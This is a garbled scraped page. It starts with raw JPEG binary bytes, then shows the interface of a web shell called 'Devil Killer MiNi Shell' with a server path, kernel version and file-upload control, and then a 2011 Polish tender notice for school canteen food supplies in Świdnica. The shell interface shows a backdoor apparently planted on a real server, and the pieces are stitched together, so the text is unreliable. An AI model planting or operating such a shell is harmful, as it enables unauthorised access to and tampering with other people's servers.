JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111217/430408-N-2011.html

<p class="kh_header"><b>Świdnica: Dostawa artykułów żywnościowych do stołówki szkolnej na 2012 rok.</b><br>
<b>Numer ogłoszenia: 430408 - 2011; data zamieszczenia: 17.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Ogólnokształcących nr III im. M. Skłodowskiej-Curie , ul. Kościelna 32, 58-100 Świdnica, woj. dolnośląskie, tel. 0 74 852 01 11, faks 0 74 853 51 15.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lo3.net.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.lo3.net.pl/bip/przetargi.htm</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka samorządu terytorialnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych do stołówki szkolnej na 2012 rok..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa artykułów żywnościowych do stołówki szkolnej na 2012 rok w grupach towarowych:
Zadanie Nr 1 - artykuły ogólnospożywcze
Zadanie Nr 2 - świeże mięso wołowe i wieprzowe
Zadanie Nr 3 - wędliny i przetwory z mięs
Zadanie Nr 4 - świeże mięso drobiowe
Zadanie Nr 5 - nabiał i sery
Zadania Nr 6 - mrożone warzywa i owoce, inne przetwory mrożone
Zadanie Nr 7 - świeże warzywa i owoce
Zadanie Nr 8 - świeże pieczywo..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.80.00.00-6, 03.14.25.00-3, 15.11.00.00-2, 15.13.11.00-6, 15.13.11.30-5, 15.11.20.00-6, 15.50.00.00-3, 15.54.00.00-5, 15.33.11.70-9, 15.89.60.00-5, 15.30.00.00-1, 15.81.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, Wykonawca składa następujące dokumenty:
1. Oświadczenie, że Wykonawca spełnia wymogi art. 22 ust.1 wg wzoru stanowiącego załącznik Nr 2 do SIWZ.
2. Oświadczenie, informacja o podwykonawcach wg wzoru stanowiącego załącznik nr 6 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zestawienie  rzeczowo-cenowe dla każdego zadania, na które zostanie złożona oferta</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Okres stałości ceny wynosi 3 miesiące od daty zawarcia umowy.
2. Po upływie okresu stałości ceny dostawca może zmienić cenę na dostarczane towary o współczynnik wzrostu cen towarów i usług konsumpcyjnych ogłoszony przez GUS za kwartał poprzedni.
3. Wzrost cen wymaga akceptacji zamawiającego wyrażonej na piśmie.
4. Zmiana ceny dostarczanych artykułów żywnościowych może nastąpić przy zmianie podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lo3.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Ogólnokształcących Nr III 58-100 Świdnica ul. Kościelna 32.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.12.2011 godzina 09:00, miejsce: Zespół Szkół Ogólnokształcących Nr III 58-100 Świdnica ul. Kościelna 32, sekretariat szkoły.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Artykuły ogólnospożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Załącznik do umowy 
dla zadania Nr 1

ZESTAWIENIE RZECZOWO-CENOWE
Artykuły ogólnospożywcze

Baton Pawełek - szt.(43g) - 90
Baton Princessa - szt.(37g) - 70
Baton Banty - szt. - 70
Brzoskwinie w puszce - szt. - 10
Cukier - kg - 760
Cukier waniliowy - szt.(16g) - 25
Cukierki - kg - 10
Chrzan - szt. - 30
Czekolada Terrawita,Goplana,Wedel,Wawel, Alpen Gold, mleczna i nadziewana - szt.(100g) - 300
Delikat do mięsa i drobiu KNORR - szt.(200g) - 70
Delicja ciastka - szt. - 70
Drożdże - szt.(100g) - 10
Dżem leśny - szt. - 32
Dżem brzoskwiniowy Łowicz - szt. - 90
Dżem truskawkowy ŁOWICZ- - szt.(280g) - 450
Dżem z czarnej pożeczki - szt. - 20
Dżem wiśniowy - szt. - 20
Groszek konserwowy - szt. - 150
Galaretka w proszku - szt. - 140
Fasola konserwowa - szt.(220g) - 40
Fix do spagetti - szt. - 100
Herbata LIPTON - op. 25 szt. - 30
Jajka kl. A - symbol M - szt. - 6500
Kakao - szt.(200g) - 100
Herbata Saga - op.20 szt. - 220
Krem czekoladowy - szt.(400g) - 100
Ketchup Tortex - szt.(500g) - 100
Herbata Saga owocowa - op.25 szt. - 30
Kukurydza konserwowa - szt.(220g) - 100
Kasza jęczmienna średnia Wiejska - kg - 150
Kasza manna błyskawiczna - Szt.(0,500g) - 5
Kasza gryczana - kg - 20
Kisiel - szt. - 120
Koncentrat Pudliszki - szt. (200g) - 300
Konserwa rybna tuńczyk - szt.(120g) - 4 0
Konserwa rybna filet śledziowy w oleju - szt. - 40
Liść laurowy - szt.(7g) - 60
Miód naturalny - szt.(370g) - 20
Makaron (nitki,kolanka,świderki,łazanki,falbanka,muszelki,spaghetti) - kg - 300
Maga - szt.(1L) - 70
Musztarda - szt.(175g) - 70
Majonez - szt.(310ml) - 170
Majeranek - szt.(7g) - 60
Mąka tortowa - kg - 20
Mąka poznańska - kg - 430
Mąka ziemniaczana - kg - 50
Olej uniwersalny - szt.(0,9L) - 7000
Ocet - l - 60
Ogórek konserwowy - szt. (1l) - 95
Ogórek konserwowy puszka - Op. (3kg) - 10
Papryka mielona GALEO - szt.(20g) - 90
Papryka konserwowa - szt. ( 1l) - 70
Pieczarka marynowana - szt. (1l) - 16
Pieprz mielony - szt.(20g) - 2600
Przyprawa jarzywko, ziarenka smaku - szt.(300g) - 150
VEGETA - szt.(300 g) - 30
Paluszki - szt.(150g) - 70
Płatki Kuleczki zbożowe czekoladowe - szt.(250g) - 70
Pasztet z drobiu - szt.(160g) - 400
Płatki kukurydziane Nestle - szt.(0,250g) - 60
Podgrzybek suszony - szt. (10g) - 40
Ryż długoziarnisty - kg - 120
Sos pieczeniowy w proszku - kg - 7
Sól jodowana - kg - 200
Syrop owocowy Paola - szt.(500ml) - 170
Sok Kubuś - szt.(250g) - 70
Sok Tymbark - szt. (250g) - 70
Szczaw konserwowy - szt.(300ml) - 95
Sałatka Szwedzka - szt.(900g) - 50
Sałatka babuni - szt.(850g) - 50
Wafle Grześki - szt. - 600
Ziele angielskie - szt.(20g) - 30
Zupa borowikowa - szt. - 30
Zupa w proszku -biały barszcz - szt. - 200
Zupa w proszku żurek - szt. - 150
Żelatyna - szt. (100g) - 20

Ilości podane w tym załączniku są ilościami przybliżonymi i mogą ulec zmianie w zależności od ilości żywionych osób.
Składający ofertę musi wypełnić wszystkie pozycje w tym załączniku. Dopuszcza się dostarczanie artykułów żywnościowych o innej gramaturze uzgodnionej z intendentem szkoły. Nie dopuszcza się zmiany (podnoszenia) cen jednostkowych zawartych w ofercie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Świeże mięso wołowe i wieprzowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Załącznik do umowy 
dla Zadania Nr 2

ZESTAWIENIE RZECZOWO-CENOWE
Świeże mięso wołowe i wieprzowe

Wołowina bez kości - kg - 90
Wołowina z kością - kg - 10
Wołowina szponder - kg - 5
Karczek bez kości - kg - 260
Łopatka bez kości - kg - 550
Mielone wieprzowe - kg - 80
Schab bez kości - kg - 50
Schab z kością - kg - 350
Szynka bez kości - kg - 160
Wątroba wieprzowa - kg - 35
Żeberka paski - kg - 20

Ilości podane w tym załączniku są ilościami przybliżonymi i mogą ulec zmianie w zależności od ilości żywionych osób.
Składający ofertę musi wypełnić wszystkie pozycje w tym załączniku. Dopuszcza się dostarczanie artykułów żywnościowych o innej gramaturze uzgodnionej z intendentem szkoły. Nie dopuszcza się zmiany (podnoszenia) cen jednostkowych zawartych w ofercie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wędliny i przetwory mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Załącznik do umowy 
dla Zadania Nr 3

ZESTAWIENIE RZECZOWO-CENOWE
Wędliny i przetwory mięsne


Boczek wędzony - kg - 4
Boczek surowy - kg - 4
Kabanos wieprzowy - kg - 30
Kiełbasa śląska - kg - 60
Kiełbasa podwawelska - kg - 140
Kiełbasa rzeszowska - kg - 6
Kiełbasa biała - kg - 40
Kiełbasa zwyczajna - kg - 4
Kiełbasa kanapkowa - kg - 10
Kiełbasa szynkowa - kg - 90
Kiełbasa krakowska - kg - 18
Kiełbasa żywiecka - kg - 40
Mielonka tyrolska - kg - 27
Ogonówka - kg - 80
Parówki - kg - 150
Polędwica drobiowa - kg - 50
Polędwica sopocka - kg - 12
Pieczeń - kg - 24
Pasztet pieczony - kg - 20
Rolada schabowa - kg - 22
Salami - kg - 20
Szynka wieprzowa prasowana - kg - 15
Szynka parzona - kg - 50
Szynka wiejska - kg - 20
Szynka w galarecie - kg - 10
Szynka tradycyjna - kg - 20

Ilości podane w tym załączniku są ilościami przybliżonymi i mogą ulec zmianie w zależności od ilości żywionych osób.
Składający ofertę musi wypełnić wszystkie pozycje w tym załączniku. Dopuszcza się dostarczanie artykułów żywnościowych o innej gramaturze uzgodnionej z intendentem szkoły. Nie dopuszcza się zmiany (podnoszenia) cen jednostkowych zawartych w ofercie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Świeże mięso drobiowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Załącznik do umowy 
dla Zadania Nr 4

ZESTAWIENIE RZECZOWO-CENOWE
Świeże mięso drobiowe

Kurczak cały - kg - 300
Filet z indyka - kg - 100
Filet z kurczaka - kg - 300
Porcje rosołowe z kaczki - kg - 75
Porcje rosołowe z kurczaka - kg - 350
Udka z kurczaka (ćwiartka) - kg - 430

Ilości podane w tym załączniku są ilościami przybliżonymi i mogą ulec zmianie w zależności od ilości żywionych osób.
Składający ofertę musi wypełnić wszystkie pozycje w tym załączniku. Dopuszcza się dostarczanie artykułów żywnościowych o innej gramaturze uzgodnionej z intendentem szkoły. Nie dopuszcza się zmiany (podnoszenia) cen jednostkowych zawartych w ofercie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Nabiał i sery.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Załącznik do umowy 
dla Zadania Nr 5

ZESTAWIENIE RZECZOWO-CENOWE
Nabiał i sery

Jogurt Jogobella - szt.( 120g) - 1200
Jogurt Prima - szt. (125g) - 1200
Jogurt GRATKA - szt. (120g) - 600
Jogurt SERDUSZKO - szt. (125g) - 600
Deser Monte (sześciopak) - szt. - 360
Danonki (czteropak) - szt. - 320
Drożdże - szt. - 10
Kefir naturalny 400g - szt. 200g - 500
Margaryna Palma - szt. 250g - 90
Margaryna śniadaniowa - szt. 250g - 30
Masło mazurskie - szt. (200g) - 1500
Masło wiejskie - szt. (200g) - 200
Mleko 2% folia - szt. - 1000
Mleko 2% karton - szt. - 200
Serek DANIO mix - szt. (140g) - 800
Serek wiejski - szt. (125g) - 700
Serek śmietankowy - kg - 175
Serek topiony (Hohland) - szt. (100g) - 200
Serek topiony krążki - szt.(100g) - 200
Ser plastry (Hohland) - szt.(150g) - 200
Ser żółty GOUDA - kg. - 100
Ser fromage - szt. 100g - 300
Ser żółty SALAMI - kg - 40
Śmietana 30% - szt. (500g) - 720
Śmietana 18% - szt. (500g) - 230
Twaróg półtłusty - kg(250g) - 2100

Ilości podane w tym załączniku są ilościami przybliżonymi i mogą ulec zmianie w zależności od ilości żywionych osób.
Składający ofertę musi wypełnić wszystkie pozycje w tym załączniku. Dopuszcza się dostarczanie artykułów żywnościowych o innej gramaturze uzgodnionej z intendentem szkoły. Nie dopuszcza się zmiany (podnoszenia) cen jednostkowych zawartych w ofercie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3, 15.54.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Mrożone warzywa i owoce, inne przetwory mrożone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Załącznik do umowy 
dla Zadania Nr 6

ZESTAWIENIE RZECZOWO-CENOWE
Mrożone warzywa i owoce,
inne przetwory mrożone 

Truskawki mrożone - szt.(2500g) - 10
Fasola szparagowa mrożona HORTEX - szt.(2500g) - 10
Grzyby - kg - 2
Mieszanka kompotowa - mrożona - szt.(2000g) - 100
Knedle domowe z truskawkami JAWO - szt.(2500g) - 18
Pyzy z mięsem - szt.(1000g) - 150
Pyzy ziemniaczane - szt.(1000g) - 18
Ryby (mintaj, sola, miruna, tilapia, i inne - kg - 400
Frytki - kg - 150
Zapiekanka - szt. - 600

Ilości podane w tym załączniku są ilościami przybliżonymi i mogą ulec zmianie w zależności od ilości żywionych osób.
Składający ofertę musi wypełnić wszystkie pozycje w tym załączniku. Dopuszcza się dostarczanie artykułów żywnościowych o innej gramaturze uzgodnionej z intendentem szkoły. Nie dopuszcza się zmiany (podnoszenia) cen jednostkowych zawartych w ofercie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9, 15.89.60.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Świeże warzywa i owoce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Załącznik do umowy 
dla zadania Nr 7

ZESTAWIENIE RZECZOWO-CENOWE
Świeże warzywa i owoce

Arbuz - kg - 40
Banany - kg - 360
Botwinka - szt. - 20
Brokuł - szt. - 30
Brzoskwinie - kg - 50
Buraki - kg - 350
Cebula - kg - 200
Cytryny - kg - 30
Czosnek - kg - 15
Fasola biała - kg - 70
Fasolka szparagowa - kg - 20
Groch łuskany - kg - 60
Gruszka - kg - 60
Jabłka - kg - 400
Kalafior - szt. - 90
Kapusta biała - kg - 250
Kapusta czerwona - kg - 110
Kapusta młoda - szt. - 50
Kapusta kiszona - kg - 660
Kapusta pekińska - szt. - 30
Kapusta włoska - kg - 350
Kiwi - szt. - 200
Koperek natka (wiązka) - szt. - 290
Mandarynka - kg - 230
Marchew - kg - 1000
Nektarynka - kg - 30
Ogórek kiszony - kg - 160
Ogórek zielony - kg - 350
Papryka czerwona - kg - 50
Papryka zielona - kg - 150
Pieczarki - kg - 200
Pietruszka zielona natka (wiązka) - szt. - 700
Pomarańcza - kg - 50
Pomidory - kg - 400
Por - szt. - 150
Rzodkiewka - szt. - 200
Sałata zielona - szt. - 300
Seler - kg - 370
Szczypiorek, cebula zielona - szt. - 190
Śliwki - kg - 20
Truskawki świeże - kg - 200
Winogron - kg - 50
Ziemniaki - kg - 8000

Ilości podane w tym załączniku są ilościami przybliżonymi i mogą ulec zmianie w zależności od ilości żywionych osób.
Składający ofertę musi wypełnić wszystkie pozycje w tym załączniku. Dopuszcza się dostarczanie artykułów żywnościowych o innej gramaturze uzgodnionej z intendentem szkoły. Nie dopuszcza się zmiany (podnoszenia) cen jednostkowych zawartych w ofercie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Świeże pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Załącznik do umowy 
dla Zadania Nr 8

ZESTAWIENIE RZECZOWO-CENOWE
Świeże pieczywo

Bułka bagietka wrocławska - szt.(100g) - 100
Bułka słodka - szt.(100g) - 450
Bułka wieloziarnista - szt.(100g) - 200
Bułka grahamka - szt.(100) - 9100
Bułka kajzerka - szt.(45g) - 360
Bułka pszenna - szt.(45g) - 360
Bułka tarta - kg - 180
Babka piaskowa - szt. - 10
Ciasto - kg - 15
Chleb duży krojony - szt.(1,00kg) - 1400
Chleb żytni - szt.(400g) - 720
Chleb tostowy - szt. - 10
Pączek - szt.(65g) - 300
Rogalik maślany - szt.(90g) - 180

